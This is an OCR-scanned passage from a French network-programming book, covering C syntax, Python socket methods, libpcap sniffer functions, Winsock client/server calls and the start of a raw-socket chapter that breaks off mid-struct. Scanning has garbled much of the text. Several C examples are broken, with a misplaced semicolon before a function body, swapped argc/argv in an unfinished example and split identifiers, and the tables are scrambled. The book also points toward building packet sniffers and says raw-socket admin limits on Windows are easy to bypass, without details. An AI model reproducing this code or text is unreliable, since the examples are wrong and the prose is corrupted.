plus importantes. Pour apprendre ce language tres important, je vous conseille 
vivement de vous procurer un livre sur le C. 



Le language C est un language compile et de haut niveau qui est tres puissant et a 
entre autre servit a developper les systemes UNIX / LINUX. Ce language a ete cree 
par Denis Richie. 



En deuxieme, il y aura une presentation des principales fonctions reseaux de Python. 



Le language Python est un language interprets et de haut niveau. II est aussi oriente 
objet (comme le C++). II est simple d'apprentissage et d'utilisation. 



En troisieme, on verra quelques fonctions de la libpcap. 
Pour finir, il y aura 2 chapitres sur Winsock. 
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Le language C 



Structure d'un programme en C 

Le code source d'un programme C suit certaines regies de structuration facilitant les 
activites du pre-processeur et du compilateur. 

Nous allons etudier cette structuration a l'aide d'un programme. 

# include <stdio.h> 

void af f icheur ( char a); 
{ 

char t = a; 
printf ("%c\n", t) ; 
} 

main ( ) 
{ 

char a; 

printf ("Entrez un caractere : \n") ; 
scanf ("%c", &a) ; 
afficheur (a) ; 
return 0 ; 

} 

Un programme en C commence toujours par l'utilisation des directives du pre- 
processeur (un programme qui va conditionner la compilation). La directive utilisee 
ici demande au pre-processeur d'inclure le fichier d'en-tete passe en argument. 

Puis on a declare une fonction qui accepte un argument et qui a pour but de l'afficher 
a l'aide de printf( ) qui est defini dans le fichier d'en-tete. 

Pour flnir, on entre dans la fonction principale : main( ). 

Cette fonction est obligatoire car les programmes commencent et finissent par elle ; 
de plus, c'est a partir de cette fonction que Ton appelle les fonctions declarees et 
definies avant main( ). 

On peut parfois passer des arguments a main( ) (lorsque l'on appelle les programmes 
a partir d'un shell par exemple). 

Pour les recuperer, on va utiliser argc et argv : 

argc a comme valeur le nombre d' argument passe a main( 
). argc ne peut etre inferieur a 1 car le nom du programme 
est toujours envoy e. 
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argv[] est un tableau contenant les caracteres passes 
comme arguments. argv[0] est le nom du programme. 



Exemple : 

int mainfint argv, char*argc [ ] ) 
{ 

if (argv <= 1 | | argv > 4) 
{ 

} 

if (argc>3 ) 
{ 

dest =gethostbyname (argc [ 1 ] ) ; 



Les bases 
Les commentaires 

Commenter ses codes de programmes est tres important surtout si Ton souhaite 
pouvoir l'ameliorer dans les semaines ou annees qui suivent son ecriture ou si Ton 
souhaite le publier sous la licence GPL. 

Cela permet de savoir a quoi sert telle ou telle partie du code. 

Pour commenter son code, le C nous propose 2 elements dont voici les syntaxes : 

Syntaxe : /* Ceci est un commentaire */ 

Syntaxe : // est un commentaire 

Le premier offre la possibility d'etaler son commentaire sur plusieurs lignes. 
Le deuxieme ne peut tenir que sur une ligne et suit une instruction. 



Les types de donnees 



Types 


Representation 


void 


c'est un type vide (en fait, cela veut dire 
que l'element auquel il est associe n'a 
pas de type). 11 est beaucoup utilise avec 
les fonctions et avec certains types de 
pointeurs. 


char 


type utilise pour les caracteres. 
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wchar t 


type utilise pour les caracteres longs. 


int 


type utilise pour les entiers. 


float 


type utilise pour les reels. 


double 


type utilise pour les reels etant en double 
precision. 


long int 


type utilise pour les entiers longs. 


short int 


type utilise pour les entiers courts. 


long double 


type utilise pour les reels etant en 
quadruple precision. 



Chaque type peut etre signe (« signed ») ou non signe (« unsigned »). 



les variables 

Qu'est-ce-qu'une variable ? 

Et bien, une variable est une suite de caracteres significatifs pointant vers une zone 
memoire contenant des donnees (valeur de la variable) et allant etre utilisees par le 
programme. 

La suite de caracteres utilisee pour identifier la variable suit certaines conventions : 

elle doit etre alphanumerique et peut contenir le caractere 
de soulignement bas ( _ ). 

les mots cles utilises par le C (instructions, fonctions. . .) 
ne peuvent etre utilises comme nom de variable, 
la l ere lettre de la variable ne peut etre un chiffre. 

La derniere convention est plus une particularity du language C, elle concerne la casse 
que respecte le C. Cela veut dire que ce dernier fait la difference entre les minuscules 
et les majuscules. 

Exemple : 

« language », « Language » et « LANGUAGE » designent 3 
variables dif f erentes . 



Declaration et initialisation 

Pour declarer des variables (ce qui est obligatoire avant de les utiliser, sinon a la 
compilation on verra apparaitre un beau petit message d'erreur), on doit ecrire le type 
de la variable suivi de son nom. 

Syntaxe : type nom de la variable ; 

Pour initialiser une variable, il faut utiliser l'operateur d'affectation qui est le signe 
egal (" = "). A la gauche de l'operateur doit se trouver la variable, a la droite, la 
valeur que doit contenir la variable. 
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Syntaxe : 



= valeur ; 



Pour information, on peut declarer puis initialiser les variables ou faire ces 2 actions 
simultanement. 



Les types de variables 

II existe plusieurs types de variables. 

Nous allons en voir 2 : les constantes et les registres. 

Une constante est une variable speciale. Sa particularity est que sa valeur ne change 
pas tout au long du programme. Pour declarer des constantes, il faut suivre le modele 
suivant : 

Syntaxe : const type nom de la variable; 

Parfois, il vaut mieux placer une variable dans l'un des registres du processeur au lieu 
de le placer en memoire. Cela est possible grace au mot cle « register ». Pour declarer 
une variable registre, il faut suivre le modele suivant : 

Syntaxe : register type nom de la variable; 

La portee des variables 

En fonction de l'endroit ou elle est declaree, une variable peut etre accessible ou non 
par les fonctions du programme. 

II existe principalement 2 types de variables : les globales et les locales. 

Les variables globales (ou encore « externes ») sont des variables independantes de 
toutes fonctions : leur portee s'etend done a 1' ensemble du programme (qui doit tenir 
sur un seul fichier source sinon il faudrait utiliser un autre type de variables). Elles 
sont accessibles par toutes les fonctions. 

Alors que les variables locales sont dependantes d'une fonction. Seule cette fonction 
peut y acceder. 

Les tableaux 

Un tableau est un element presque semblable aux variables. 



Similitudes 


Differences 


- lis sont identifies (references) 


- les tableaux pointent vers un 
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par des noms. groupe de zones memoires (ou 

chaque element est accessible a 
- Les noms utilises pour les l'aide d'un numero qui determine 
identifier suivent les memes sa place dans le tableau). 
regies de creation. 



II existe differents types de tableaux : 

les tableaux a une dimension. 

les tableaux a plusieurs dimensions. 

Pour declarer un tableau, il faut suivre le modele suivant : 

Syntaxe : type nom du tableau [x] ; 



Soit x le nombre maximal d' elements dans le tableau. 



Instructions 


Syntaxe 


Explications 


Le test if: 


if (test) 
{ 

bloc instructions; 

} 


11 permet de faire un saut conditionnel. 
Cela veut dire que si le test reussi, le 
programme va executer les instructions 
dans le bloc puis continuer jusqu'a la fin 
de main( ), sinon il continu le 
programme sans executer le bloc. 


Le test if et la clause else : 


if (test) 
{ 

bloc instructionsl; 
} else { 

bloc instructions2 ; 

} 


Permet de faire un saut conditionnel. 
Cela veut dire que si le test reussi, le 
programme va executer les instructions 
du bloc 1 puis continuer jusqu'a la fin de 
main( ), sinon il va executer les 
instructions du bloc 2 puis continuer 
jusqu'a la fin de main( ). 


Le test if et la clause else if : 


if (test) 

instructionsl; 
else if (test2) 
instructions2; 


Permet de faire un saut conditionnel. On 
fait plusieurs tests : 1' instruction execute 
est celui qui suit directement le test qui 
est vrai. 


La boucle for : 


for (debut; fin; pas) 
instruction ; 

OU 


Permet de faire une boucle qui va 
executer une instruction ou un bloc 
d' instructions un nombre determine de 
fois. C'est une instruction puissante et 
utile. 
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for (debut; fin; pas) 




{ 

bloc instructions; 

} 




La boucle while : 


while (condition) 
instruction; 

OU 


Permet de faire une boucle qui va 
executer une instruction ou un bloc 
d'instruction tant que la condition est 
vraie. 


while (condition) 




{ 

bloc instructions; 

} 




La boucle do/while : 


do 

instruction ; 
while (condition) ; 

OU 

do 
{ 

bloc instructions; 
} while (condition) ; 


Permet de faire une boucle qui va 
executer une instruction ou un bloc 
d' instructions tant que la condition est 
vraie. 

Sa particularite est qu'elle execute 
l'instruction ou le bloc d'instruction 
avant que la condition soit testee. 



Pour information, la boucle while fait l'inverse de do/while : elle teste la condition 
avant d'executer l'instruction ou le bloc d'instruction. 



Les notions avancees 
Les pointeurs 

Un pointeur est une variable speciale: sa valeur est en fait l'adresse memoire d'une 
autre variable. Pour faire plus court: un pointeur est une variable qui pointe vers une 
autre variable. 

Pour declarer un pointeur, il faut suivre le modele suivant : 
Syntaxe : type *nom du pointeur; 



Pour information, pour acceder aux elements suivant et precedant l'element que 
pointe le pointeur, il faut incrementer/decrementer le pointeur a l'aide de + + ou — 

Syntaxes : pointeur++ ou pointeur-- 



Quelques precisions : 
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nom_du_pointeur : est un pointeur qui pointe vers 
l'adresse d'une variable. 

*nom_du_pointeur : est un pointeur qui pointe vers le 
contenu d'une variable. 

&nom_du_pointeur : retourne l'adresse de la variable. 

Les structures 

Une structure est un element qui permet de regrouper des variables, des tableaux. . . 
Ces derniers seront utilises pour accomplir certaines taches specifiques. 

Les structures sont tres souvent utilisees pour enregistrer des donnees quelconques et 
de types differents. 

Pour definir une structure, il faut suivre le modele suivant : 
Syntaxe : struct nom { 

variablel ; 
variable2 ; 

} 

On ne peut pas encore utiliser la structure car on l'a seulement definie : il faut la 
declarer. 

Et oui! « nom » n'est pas une variable structure, on peut le considerer comme un type. 
Pour declarer une variable structure, il faut suivre le modele suivant : 
Syntaxe : struct nom varl [ , var2 , ...] ; 

Les variables declarees dans une structure sont appelees « membres d'une structure ». 

Lorsque Ton veut acceder aux membres d'une structure, il faut utiliser l'operateur 
point ( . ). 

Syntaxe : varl.membre name; 



Pour information, il existe d'autres types de structures dont : 

les structures qui ont comme membres d'autres 
structures. 

les tableaux de structures. La particularite de ces 
structures est que chaque element du tableau de structures 
est une structure. 

De quoi donner des migraines lors de l'etude de codes sources integrant ces types de 
structures. 
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Maintenant, voyons d'autres elements semblables aux structures: les unions. 

Leur particularity est que Ton accede a leurs membres un a un, alors que Ton peut 
acceder aux membres d'une structure en meme temps. 

Pour definir des unions, il faut suivre le modele suivant : 

Syntaxe : union nom { 

variablel ; 
variable2 ; 

} 

Pour les declarer, il faut suivre le modele suivant : 
Syntaxe : union nom varl [ , var2 , ...] ; 



Le pre-processeur 

Le pre-processeur C travaille avant le compilateur. II a pour but de traiter les 
directives se trouvant au debut du code source. 



Voyons diverses directives : 



#define x y 


specifie au pre-processeur de remplacer x 
par y dans le code source. 


#undef x 


specifie au pre-processeur de ne plus 
remplacer x par y dans le code source. 


#include <xxx> 


specifie au pre-processeur d'inclure des 
fichiers au code source. Generalement se 
sont des fichiers d'en-tete qui sont inclus. 


#if premiere condition 
#elif deuxieme condition 
#else 
#endif 


Comme l'instruction if/else. Ces 
directives specifie au compilateur (par 
l'intermediaire du pre-processeur) de 
faire telles ou telles actions en fonction 
du test effectue. 

Par exemple : elles permettent de 
compiler des parties du code en fonction 
de la nature du systeme d' exploitation 
(Windows, linux...). 



Les fonctions 



174 



Une fonction est une suite de code qui est ecrit pour un but precis, qui est identifiee 
(referencee) par un nom et qui a la particularity d'apporter une certaine modularity 
dans le code. 



Notions importantes sur les fonctions: 

II existe deja des fonctions specifiques au C (comme 
printf( )). Leur nom ne peut done etre utilise pour 
nommer nos propres fonctions. 
- Une fonction peut accepter ou non des arguments. 
Une fonction peut renvoyer ou non des elements. 
On passe les arguments a la fonction lors de son appel. 
Une fonction est soit iterative (les instructions s'executent 
a la suite) soit recursives (la fonction peut s'appeler). 



175 



176 



Python et les sockets 



Voici une petite liste (dans l'ordre alphabetique) des methodes qu'utilisent les 
sockets. Car le language Python est oriente objet et supporte done les notions de 
classes, polymorphisme... comme le language C++. 



Voici cette liste : 



socket . accept ( ) 

socket . bind (addresse) 

socket . close ( ) 

socket . connect (addresse) 

socket . f ileno ( ) 

socket . gethostbyname (hostname ) 

socket . gethostname ( ) 

socket . getpeername ( ) 

socket . getsockname ( ) 

socket . getsockopt ( ) 

socket . listen (max connexions) 

socket . re cv (data_size) 

socket . reevfrom (data size) 

socket . send (donnees ) 

socket . sendto (donnees, addresse_distante) 
socket. setblocking (flag) 
socket . setsockopt ( ) 

socket ( socket famille, type [ , protocole] ) 



socket.accept() 

Cette methode accepte une connexion sur le socket. 

Exemple : sock client, adr = socket . accept ( ) 

socket.bind(adresse) 

Cette methode affecte un nom et un port a un socket. 

Exemple : socket . bind (("", 1024 ) ) 



socket.closeO 

Cette methode ferme un socket. 
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socket.connect(adresse) 

Cette methode permet a un client de se connecter a un serveur. 

Exemple : socket . connect (( "serveur . com" , 1024 ) ) 

socket.fileno() 

Cette methode retourne un descripteur de fichier. 
socket.gethostbyname(hostname) 

Cette methode permet d'obtenir l'adresse IP de la machine a qui appartient le nom 
d'hote passe en argument. 

socket.gethostname() 

Cette methode permet d'obtenir le nom de la machine sur laquelle elle est employee. 
socket.getpeername() 

Cette methode retourne le nom de la machine se trouvant a l'autre extremite du 
socket. 

socket.getsockname() 

Cette methode permet d'obtenir l'adresse et le port utilise par le socket. II renvoie ces 
elements sous forme de liste : (ipadr, port). 

socket.getsockopt() 

Cette methode permet d'obtenir les options du socket. 
socket.listen(maxconnexions) 

Cette methode permet de forcer un serveur a ecouter un port dans l'attente d'une 
connexion. L'argument passe a la fonction est le nombre de connexions que doit 
accepter le serveur. 

Exemple : socket . listen ( 10 ) 
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socket.recv(datasize) 

Cette methode permet de recevoir des donnees de la machine se trouvant a l'autre 
bout du socket. L'argument passe a la fonction est la taille des donnees devant etre 
recuperees. 

Exemple : tm = s.recv(1024) 

socket.recvfrom(datasize) 

Comme la precedente mais s'utilise avec le protocole UDP. 
socket.send(donnees) 

Cette methode permet d'envoyer des donnees a la machine se trouvant a l'autre bout 
du socket. 

socket.sendto(donnees, addresse distante) 

Comme la precedente mais s'utilise avec le protocole UDP. Le deuxieme argument 
passe a la fonction est l'adresse qui va recevoir les donnees. 

socket.setblocking(flag) 

Affecte au socket les modes blocking ou nonblocking. 
socket.setsockopt() 

Cette methode permet de mettre des options sur le socket. 

socket(socket_famille, type[, protocole]) 

Cette fonction cree un socket. 

La famille de socket est generalement AF INET. 

Les types de sockets sont generalement : 

- SOCK STREAM (top) 

- SOCK DGRAM (udp) 
SOCKRAW (pour les raw sockets). 
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La libpcap 



Nous allons ensemble voir quelques fonctions reseau que nous fournit la libpcap. 

Cette bibliotheque de fonctions a ete developpee par le groupe ayant cree le celebre 
sniffer TCPdump. 

char pcap_lookupdev(char *err); 

Elle retourne le nom de l'interface reseau pouvant etre utilisee par la fonction 
pcap_open_live(). Le parametre de la fonction est un message d'erreur expliquant que 
la fonction n'a pas reussie si cette derniere ne peut definir l'interface. 

int pcap_lookupnet(char *dev, bpf_u_int32 *net, bpf_u_int32 

*mask, char *err); 

le l ei parametre est la variable contenant l'interface reseau a utiliser. 

Le 2 erae est un pointeur sur un entier de type bpfuint. Cet entier va contenir 
l'adresse reseau de l'interface choisie. 

Le 3 eme est aussi un pointeur sur un entier de type bpf u int. Cet entier va contenir 
l'adresse du masque reseau de l'interface choisie. 

Le 4 eme est une chaine d'erreur. 

A l'appel de cette fonction, les parametres 2 et 3 auront une valeur, pas avant ! 

pcap t *pcap_open_live(char *dev, int snaplen, int promise, int 

toms, char *err); 

Le l er parametre doit etre une chaine contenant l'interface reseau choisie. 

Le 2 eme est le nombre maximum d' octets a capturer sur les paquets passant par 
l'interface: done par le sniffer. 

Le 3 eme parametre permet de mettre ou non l'interface reseau en mode promiscuite. 
Le 4 eme parametre permet de specifier un timeout de lecture des paquets. 
Le 5 eme parametre est une chaine contenant un message d'erreur. 
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II y a une autre fonction pratiquement semblable a pcap_open_live( ): c'est 
pcapt *pcap_open_offline(const char *file, char *err); qui met les paquets 
captures dans un fichier que Ton pourra consulter apres la capture. 

Avant pcap_open_live() on voit un element nouveau qui est en faite une structure 
definie dans pcap.h. Cette structure comme vous avez du le remarquer est : pcap_t. 



void pcap_close(pcap_t ); 

Cette fonction arrete la capture de paquets a partir du descripteur passe en argument a 
la fonction. 



void pcap_close(pcap_t *p) 
{ 

/*xxx*/ 

if (p->fd >= 0) { 
#ifdef linux 

pcap_close_linux(p); 

#endif 

close(p->fd); 

} 

if (p->sf.rfile != NULL) { 

if (p->sf.rfile != stdin) 

(void)fclose(p->sf.rfile); 
if (p->sf.base != NULL) 
free(p->sf.base); 
} else if (p->buffer != NULL) 
free(p->buffer); 

pcap_freecode(&p->fcode); 
free(p); 

} 



int pcap_loop(pcap_t, int cnt, pcap handler callback, u char 
*user_data); 

Cette fonction lit cnt paquets du descripteur de paquets pcap_t puis passe le tout a la 
fonction callback avec comme argument user_data . 

callback traitera le paquet et l'affichera si le developpeur de l'application le souhaite. 



int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user) 
{ 

register int n; 
for(;;){ 

if (p->sf.rfile != NULL) 
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n = pcap_offline_read(p, cnt, callback, user); 

else { 

/* 

* XXX keep reading until we get something 

* (or an error occurs) 

*/ 

do{ 

n = pcap_read(p, cnt, callback, user); 
} while (n == 0); 

} 

if (n <= 0) 

return (n); 
if (cnt > 0) { 

cnt -= n; 

if (cnt <= 0) 

return (0); 

} 

} 

} 

const uchar* pcap_next(pcap_t *p, struct pcap_pkthdr 
*header); 

C'est cette fonction qui va nous permettre de capturer les paquets apres que la 
fonction pcap_open_live( ) est ete utilisee. 

Le l er parametre est le descripteur utilise avec la fonction pcap_open_live( ) . 

Le 2 erae parametre est un pointeur sur une structure qui va contenir les en-tetes du 
paquet capture. Cette structure est definie dans le fichier pcap.h. 

Voici de quoi elle se compose : 

struct pcap pkthdr { 

struct timeval ts; /* time stamp */ 
bpf_u_int32 caplen; /* length of portion present */ 
bpf_u_int32 len; /* length this packet (off wire) */ 

}; 



const u_char * pcap_next(pcap_t *p, struct pcap_pkthdr *h) 
{ 

struct singleton s; 
s.hdr = h; 

if (pcap_dispatch(p, 1, pcap oneshot, (u_char*)&s) <= 0) 

return (0); 
return (s.pkt); 

} 



int pcap_stats(pcap_t *p, struct pcap stat *stat); 
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Cette fonction nous fournit quelques informations sur les paquets captures. Ce sont 
des informations comme le nombre de paquets recus par le logiciel de capture et le 
nombre de paquets droppes par le logiciel de capture. 

Le l er parametre est le descripteur utilise pas la fonction pcap_open_live( ) . 

Le 2 eme parametre est une structure qui va contenir les informations retournees par la 
fonction. Pour savoir de quelles informations il en retourne, remontez de quelques 
lignes. 

Voici comment se presente cette structure : 

struct pcap_stat { 

u_int psrecv; /* number of packets received */ 

u_int ps_drop; /* number of packets dropped */ 

u_int ps_ifdrop; /* drops by interface XXX not yet supported */ 

}; 



int pcap_compile(pcap_t *p, struct bpf_program *filter_t, char 

*filter_str, int optimize, bpf_u_int32 
netmask); 

Cette fonction permet de creer un filtre pour paquets. 

II compile la chaine de filtre contenue dans filter_str et la met dans la structure 
struct bpf_program *filter_t definie dans le fichier bpfh et dont voici le code : 

struct bpf_program { 
u int bf len; 

struct bpf insn *bf_insns; 

}; 

Si int optimize est mis a 1 (true), le filtre produit est optimise. Le dernier parametre 
est une variable contenant le masque reseau de l'interface choisi dont le descripteur 
est pcap_t *p. 



int pcap_setfilter(pcap_t *p, struct bpf_program *filter_t); 

Cette fonction associe le descripteur de capture pcap_t *p avec la structure contenant 
le filtre. 



int pcap_setfilter(pcap_t *p, struct bpf program *fp) 
{ 

if (install_bpf_program(p, fp) < 0) 

return (-1); 
return (0); 

} 
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On vient de voir les principales fonctions de la libpcap. Normalement, arme de ces 
informations, vous devriez etre capable de developper un sniffer voir plus. . . 



Avant de finir ce chapitre, voici un apercu des fonctions de la libpcap. La disposition 
n'a ete ni choisie ni faite au hasard, c'est la disposition adoptee dans pcap.h. 



char *pcap_lookupdev(char *); 

int pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *); 

pcap_t *pcap_open_live(char *, int, int, int, char *); 

pcap_t *pcap_open_dead(int, int); 

pcap_t *pcap_open_offline(const char *, char *); 

void pcap_close(pcap_t *); 

int pcap_loop(pcap_t *, int, pcaphandler, u_char *); 
int pcap_dispatch(pcap_t *, int, pcap handler, uchar *); 
const u char* 

pcap_next(pcap_t *, struct pcap_pkthdr *); 
int pcap_stats(pcap_t *, struct pcap_stat *); 
int pcap_setfilter(pcap_t *, struct bpf_program *); 
int pcap_getnonblock(pcap_t *, char *); 
int pcap_setnonblock(pcap_t *, int, char *); 
void pcap_perror(pcap_t *, char *); 
char *pcap_strerror(int); 
char *pcap_geterr(pcap_t *); 

int pcap_compile(pcap_t *, struct bpf_program *, char *, int, 
bpf_u_int32); 

int pcap_compile_nopcap(int, int, struct bpf_program *, 

char *, int, bpf_u_int32); 
void pcap_freecode(struct bpf_program *); 
int pcap_datalink(pcap_t *); 
int pcap_snapshot(pcap_t *); 
int pcap_is_swapped(pcap_t *); 
int pcap_major_version(pcap_t *); 
int pcap_minor_version(pcap_t *); 



FILE *pcap_file(pcap_t *); 
int pcap_fileno(pcap_t *); 

pcap_dumper_t *pcap_dump_open(pcap_t *, const char *); 
void pcap_dump_close(pcap_dumper_t *); 

void pcap_dump(u_char *, const struct pcap_pkthdr *, const u char *); 



int pcap_findalldevs(pcap_if_t **, char *); 

void pcap_freealldevs(pcap_if_t *); 

u_int bpf_filter(struct bpfinsn *, u char *, uint, uint); 

int bpf_validate(struct bpf insn *f, int len); 

char *bpf_image(struct bpf_insn *, int); 

void bpf_dump(struct bpf_program *, int); 
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Winsock 



Winsock est une API de Microsoft qui permet de developper des applications TCP et 
UDP (grace a Winsock 2) de bas niveau avec les sockets streams (pour Winsock 1.1) 
ou les raw sockets (pour Winsock 2). 



Winsock 1.1 

Les applications reseaux crees avec Winsock 1 . 1 suivent le meme schemas que ceux 

crees avec d'autres bibliotheques de fonctions reseaux. 

La seule particularity est qu'avant de creer le socket, il faut initialiser winsock. 



Voici le schemas de creations : 



Serveur 


Client 


On initialise Winsock 

\/ 

On creer le socket 
\/ 

On renomme le socket 
\/ 

On le met sur ecoute 

\/ 

On accepte la connexion 

\/ 

On gere les requetes du/des 
client (s ) 


On initialise Winsock 
\/ 

On creer le socket 
\/ 

On le connecte au serveur 
\/ 

On envoie nos requetes 



On va commencer par voir les fonctions qu'utilise(nt) le(s) client(s). 

D'abord sachez que pour faire fonctionner les applications winsock, il vous faut : 

winsock.h 
- wsock32.1ib 



Client 

On initialise Winsock 

Pour initialiser Winsock, il faut la fonction : WSAStartup( ). 

Sa syntaxe est la suivante : int WSAStartup (WORD wVersionRequired, 

LPWSADATA IpWSAData); 

Le l er argument est la version de Winsock que Ton veut utiliser (soit 1.1 ici). 
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Le 2 eme argument est l'adresse d'une structure de type WSAData qui est definie dans 
winsock.h. 



typedef struct 


WSAData { 




WORD wVersion; 




WORD wHighVersion; 




char szDescription [WSADESCRIPTION LEN+1 ] ; 




char szSystemStatus [WSASYS STATUS LEN+1]; 




unsigned short iMaxSockets; 




unsigned short iMaxUdpDg; 




char FAR *lpVendor!nfo; 


} WSADATA; 





Voici un exemple de cette fonction : 

WORD wVersionRequired ; 

LPWSADATA lpWSAData; 

wVersionRequested = MAKEWORD ( 1 , 1 ) ; 

init = WSAStartup (wVersionRequested, SWSAData) ; 



On creer le socket 

Pour creer le socket, on utilise la fonction : socket( ). 

Sa syntaxe est la suivante : SOCKET socket (int af, int type, int protocol); 

Le l er argument est la famille du socket (generalement c'est AF INET. Les autres 
families sont presentees dans winsock.h). 

Le 2" me argument est le type de socket (il y a SOCKSTREAM, SOCKDGRAM. . . : 
ils sont definis dans winsock .h). 

Le 3 6me argument est le protocole utilise (il y a IPPROTO IP, IPPROTO ICMP. . . : 
ils sont definis dans winsock.h). 



Avant d'utiliser la fonction socket, il nous faut remplir une structure de type 
sockaddr in. 



struct sockaddr in { 




short 


sin family; 


u short 


sin port; 


struct 


in addr sin addr; 


char 


sin zero [ 8 ] ; 


}; 





Voici un exemple de cette fonction : 
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SOCKET socket; 

struct sockaddr in sin; 

sin. sin addr.s addr = htonl (inaddr any); 
sin . sin_f amily = AF_INET; 

sin. sin port = htons (xx) ; 

sock = socket (AF INET, SOCK STREAM, IPPROTO IP); 



En cas d'echec lors de la creation du socket, socket( ) renvoie : INVALIDSOCKET. 

Avant de passer a la fonction suivante, voyons un petit element (ou plutot une 
fonction) : htons( ). 

Cette fonction permet de placer les octets du port dans le meme ordre dans chaque 
architecture. 



Pour information, chaque architecture PC traite de manieres differentes les octets, soit 
elles placent d'abord le byte de poids faible puis celui de poids fort (little endian) soit 
elles placent celui de poids fort pour terminer avec celui de poids faible (big endian). 
Cela depasse le cadre de ce livre done on ne s'y attardera pas. 



II existe d'autres fonctions de ce type definies dans winsock.h (comme toujours) : 

- u long htonl (u long hostlong) ; 

- u_short htons (u_short hostshort) ; 

- u long ntohl (u long netlong) ; 

- u short ntohs (u short netshort) ; 



On connecte le socket au serveur 

Pour faire cela, on utilise la fonction : connect( ). 

Sa syntaxe est la suivante : int connect (SOCKET s, const struct sockaddr 

FAR *name, int namelen); 

Le l er argument est le descripteur de socket. 

Le 2 eme argument est une structure de type sockaddr. 



struct sockaddr { 

u short sa family; /* address family */ 
char sa_data[14]; /* up to 14 bytes of direct address */ 

}; 



Le 3 erne argument est la taille de la structure de type sockaddr. 

Voici un exemple de cette fonction : 
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connect (socket, 
sockaddr) ) ; 



(sockaddr *) Sstructure, 



sizeof ( struct 



On programme ce pour quoi le client est cree 

Cette partie du programme depend du developpeur de 1'application. 
Nous allons seulement voir 2 fonctions permettant de communiquer avec le serveur. 
La premiere fonction est send( ) et sert a envoyer des donnees, la deuxieme est recv() 
et sert a recevoir des donnees envoyees avec send( ). 

La syntaxe de send( ) est la suivante : int send(SOCKET s, const char FAR * 

buf, int len, int flags); 

Le l er argument est le descripteur de socket. 

Le 2 eme argument est un espace memoire qui contient la chaine a envoyer. 
Le 3 eme argument est la longueur de cet espace. 

Le 4 erae argument doit toujours etre mis a 0 car il n'est pas tres important. 

La syntaxe de recv( ) est la suivante : int recv (SOCKET s, char FAR * buf, 

int len, int flags); 

Le l er argument est le descripteur de socket. 

Le 2 eme argument est un espace memoire qui va contenir la chaine envoyee avec 
send(). 

Le 3 eme argument est la longueur de cet espace. 

Le 4 erae argument doit toujours etre mis a 0 car il n'est pas tres important. 

Voici un exemple de ces fonctions : 

envoyer = send(socket, buffer, strlen (buf fer) , 0); 
recevoir = recv (socket, buffer, 512, 0); 



Serveur 

Pour alleger le livre, nous allons seulement voir les elements nouveaux pour la 
creation du serveur. Car en revoyant le schemas de creation d'un serveur, on 
remarque qu'il y a des ressemblances avec celui des clients. 



190 



On renomme le socket 

Pour associer le socket cree avec notre adresse reseau, il faut utiliser la fonction bind( 
)• 

Sa syntaxe est la suivante : int bind (SOCKET s, const struct sockaddr FAR 

* addr, int namelen); 

Le l er argument est le descripteur de socket. 

Le 2 eme argument est une structure sockaddr 

Le 3 eme argument est la taille de cette structure. 

Voici un exemple de cette fonction : 

bind (sock, (sockaddr *)&strutre, sizeof (struct sockaddr)) 
On le met sur ecoute 

Pour mettre le serveur en ecoute (en attente d'une connexion), il faut utiliser la 
fonction listen( ). 

Sa syntaxe est la suivante : int listen (SOCKET s, int backlog); 
Le l er argument est le descripteur de sockets. 

Le 2 eme argument est le nombre maximal de connexions (le maximum de clients que 
peut gerer le serveur en meme temps). 

Voici un exemple de cette fonction : 
listen ( socket , 5) ; 

On accepte la connexion 

Pour accepter des connexions de clients, on utilise la fonction accept( ). 

Sa syntaxe est la suivante : SOCKET accept (SOCKET s, struct sockaddr FAR 

*addr, int FAR *addrlen); 

Le ler argument est le descripteur de socket. 

Le 2 eme argument est une structure de type sockaddr. 
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Le 3 eme argument est la taille du 2 eme argument. 

La structure du 2 eme argument est remplie par la fonction elle-meme. 

Voici un exemple de cette fonction : 

accept ( socket , (struct sockaddr * ) &structure, &taille_struct) 
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Winsock (suite) 



Winsock permet aussi de manipuler les raw sockets qui proposent des fonctions de 
programmation puissantes. On va pouvoir developper de tres bons sniffers, des 
generateurs de paquets reseaux, des modificateurs d'en-tete de paquets passant par 
notre interface reseau. . . 

On ne peut utiliser les raw sockets sans etre administrateur de la machine. Mais bien 
sur, sous Windows, on peut facilement contourner la pseudo restriction liee a 
l'utilisation des raw sockets. Comme a chaque nouveau systeme Windows, Microsoft 
change les moyens de restriction, tous les citer ne ferait qu'alourdir ce livre. 

Nous allons voir differentes fonctions permettant de manipuler les raw sockets puis 
nous allons nous attaquer au sujet meme. 

On cree le socket 

Pour cela, on utilise la fonction : WSASocket. 

Sa syntaxe est la suivante : SOCKET WSASocket (int af, int type, int 

protocol, 

LPWSAPROTOCOLJNFO 
IpProtocolInfo, GROUP g, 
DWORD dwFlags); 

Le l er argument est la famille du socket. 

Le 2 eme argument est le type du socket (ici, 9a sera SOCK RAW car on travail avec 
les raw sockets). 

Le 3 eme argument est le protocole utilise. 

Le 4 eme argument est une structure sur le socket cree. 

Le 5 eme argument est rempli par Windows (ne vous en preoccupez pas, generalement 
il faut mettre comme valeur: NULL). 

Le 6 eme argument permet de specifier les attributs du socket qui va etre cree. 

On met des options au socket 

Pour cela, il faut utiliser la fonction setsockopt( ). 

Sa syntaxe est la suivante : int setsockopt (SOCKET s, int level, int optname, 
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const char FAR * optval, int 
optlen); 

Le l er argument est le descripteur de socket. 

Le 2 eme argument est le niveau des options. 

Le 3 eme argument est l'option/les options. 

Le 4 eme argument est un espace memoire. 

Le 5 eme argument est la taille de cet espace memoire. 

setsockopt( ) renvoie 0 si il reussie a mettre des options sur le socket, 
SOCKETERROR en cas d'erreur. 

On envoie un paquet 

Pour faire cela, il faut utiliser la fonction sendto( ). 

Sa syntaxe est la suivante : int sendto (SOCKET s, const char FAR * 

int len, int flags, const struct 
sockaddr FAR *to, int tolen); 

Le l er argument est le descripteur de socket. 

Le 2 eme argument est un buffer qui contient les elements a envoyer. 

Le 3 eme argument est la taille de ce buffer. 

Le 4 eme argument est reserve et doit etre mis a 0x0. 

Le 5 eme element est une structure de type sockaddr. 

Le 6 eme argument est la taille de cette structure. 

Raw sockets 

IP 

Voici un paquet IP : 
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Version 


IHL 


Type de 


Longueur du paquet 






service 








dentificateur 


Flags 


Offset du 










Fragment 


TTL 


Protocole 


Cheksum d'en-tete 


Adresse IP source 


Adresse IP cible 


Options / remplissage ( padding ) 


Zones de donnees. . . 



Maintenant, voici la structure associee au protocole IP : 



typedef struct iphdr 
{ 



unsigned char 


verlen; 


//La 




version du protocole IP et la 
longueur de l'en-tete 


unsigned 


char 


tos ; 

